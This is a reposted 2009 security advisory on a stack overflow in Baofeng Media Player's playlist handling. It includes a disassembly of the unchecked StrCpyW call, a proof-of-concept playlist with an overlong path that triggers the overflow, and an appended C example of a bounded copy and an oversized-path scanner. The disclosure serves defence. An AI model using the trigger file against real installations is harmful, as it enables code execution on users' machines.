Baofeng Media Player playlist stack overflow

2009.07.28
Credit: Jambalaya
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Baofeng Media Player playlist stack overflow vulnerability
By Jambalaya of Nevis Labs
Date: 2009.06.24

Vendor: Baofeng

Affected: Storm 3.9.62
*Other versions may also be affected

Overview:
Baofeng is a widely popular media player in China, and it plays many common media file formats. There are almost 120 million customers using Baofeng Media Player in China.

Details:
The specific flaw exists in medialib.dll. The stack overflow vulnerability is due to the way it incorrectly handles the smpl file type, which is a playlist. Successfully exploiting this vulnerability allows attackers to execute arbitrary code on a vulnerable installation.

The vulnerability can be triggered by passing a long path, because the length of the path is never checked:

.text:1000567B ; int __stdcall sub_1000567B(LPCWSTR pszUrl, DWORD pcchPath)
.text:1000567B sub_1000567B    proc near               ; DATA XREF: .rdata:100248D4o
.text:1000567B
.text:1000567B FileName        = word ptr -628h
.text:1000567B var_10          = dword ptr -10h
.text:1000567B var_C           = dword ptr -0Ch
.text:1000567B var_4           = dword ptr -4
.text:1000567B pszUrl          = dword ptr  8
.text:1000567B pcchPath        = dword ptr  0Ch
.text:1000567B
.text:1000567B                 mov     eax, offset sub_100221F8
.text:10005680                 call    __EH_prolog
.text:10005685                 sub     esp, 61Ch
.text:1000568B                 push    ebx
.text:1000568C                 push    esi
.text:1000568D                 mov     esi, [ebp+pszUrl]
.text:10005690                 mov     [ebp+var_10], ecx
.text:10005693                 test    esi, esi
.text:10005695                 jz      loc_1000577D
.text:1000569B                 mov     ebx, [ebp+pcchPath]
.text:1000569E                 test    ebx, ebx
.text:100056A0                 jz      loc_1000577D
.text:100056A6                 push    edi
.text:100056A7                 push    esi             ; pszPath
.text:100056A8                 xor     edi, edi
.text:100056AA                 mov     [ebp+pcchPath], 208h
.text:100056B1                 call    ds:PathIsURLW
.text:100056B7                 test    eax, eax
.text:100056B9                 jz      short loc_100056E0
.text:100056BB                 push    3               ; UrlIs
.text:100056BD                 push    esi             ; pszUrl
.text:100056BE                 call    ds:UrlIsW
.text:100056C4                 test    eax, eax
.text:100056C6                 jz      short loc_100056E0
.text:100056E0 loc_100056E0:                           ; CODE XREF: sub_1000567B+3Ej
.text:100056E0                                         ; sub_1000567B+4Bj
.text:100056E0                 lea     eax, [ebp+FileName]
.text:100056E6                 push    esi
.text:100056E7                 push    eax
.text:100056E8                 call    ds:StrCpyW      ; <-- StrCpyW called directly, without any length check

Proof of concept:
<playlist><item name="2.GIF" source="C:\Documents and Settings\Linlin\ÀÃæ\2.GIF" duration="0"/><item name="0001.gif" source="C:\Documents and Settings\Linlin\ÀÃæ\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif" duration="0"/></playlist>

Greetz to those friends who I have long time no see T_T: Pratik Dixit, Sanjay Pendse, Winny Thomas, ajit.hatti

Vendor Response:
2009.06.16 Vendor notified via email
2009.06.25 Vendor released a new version
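As an added example (not the advisory's or Baofeng's code), a C sketch of the check the listing lacks: a bounded replacement for the StrCpyW call, plus a defender-side scanner that flags playlist files whose source attributes exceed an assumed 260-character (MAX_PATH) limit before a vulnerable player opens them. Narrow chars stand in for the WCHARs medialib.dll copies; the sample playlist is constructed.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not Baofeng's code. Models the fix for the unchecked StrCpyW
 * in the listing above and a file-level check for over-long playlist paths.
 * PATH_CCH_MAX (260, MAX_PATH) is an assumed limit; narrow chars stand in for
 * the WCHARs medialib.dll copies. */
#define PATH_CCH_MAX 260

/* Bounded replacement for StrCpyW: copies src into dst only if it fits in
 * dst_cch characters including the terminator; otherwise leaves dst empty
 * and returns 0 so the caller rejects the playlist entry. */
int copy_path_checked(char *dst, size_t dst_cch, const char *src)
{
    if (dst == NULL || src == NULL || dst_cch == 0) return 0;
    size_t n = strlen(src);
    if (n >= dst_cch) { dst[0] = '\0'; return 0; }   /* would overflow */
    memcpy(dst, src, n + 1);
    return 1;
}

/* Defender-side scan of playlist text like the PoC: counts source="..."
 * attributes whose value is max_cch characters or longer. A non-zero count
 * flags the file before any vulnerable player parses it. */
size_t count_oversized_sources(const char *xml, size_t max_cch)
{
    const char *key = "source=\"";
    size_t hits = 0;
    for (const char *p = strstr(xml, key); p != NULL; p = strstr(p, key)) {
        p += strlen(key);
        const char *end = strchr(p, '"');
        if (end == NULL) break;                      /* unterminated attribute */
        if ((size_t)(end - p) >= max_cch) hits++;
        p = end + 1;
    }
    return hits;
}

int main(void)
{
    /* constructed sample: one benign item, one with a 700-character path */
    char longpath[701]; memset(longpath, 'A', 700); longpath[700] = '\0';
    char xml[1024], buf[PATH_CCH_MAX];
    snprintf(xml, sizeof xml,
             "<playlist><item name=\"a.gif\" source=\"C:\\ok\\a.gif\" duration=\"0\"/>"
             "<item name=\"b.gif\" source=\"%s\" duration=\"0\"/></playlist>", longpath);
    printf("oversized source attributes: %zu\n", count_oversized_sources(xml, PATH_CCH_MAX));
    printf("long path accepted by bounded copy: %d\n", copy_path_checked(buf, sizeof buf, longpath));
    return 0;
}
```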
_______________________________________________
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

References:

http://www.securityfocus.com/bid/35512
http://secunia.com/advisories/35592
http://marc.info/?l=full-disclosure&m=124627617220913&w=2
http://marc.info/?l=full-disclosure&m=124624413120440&w=2


Copyright 2017, cxsecurity.com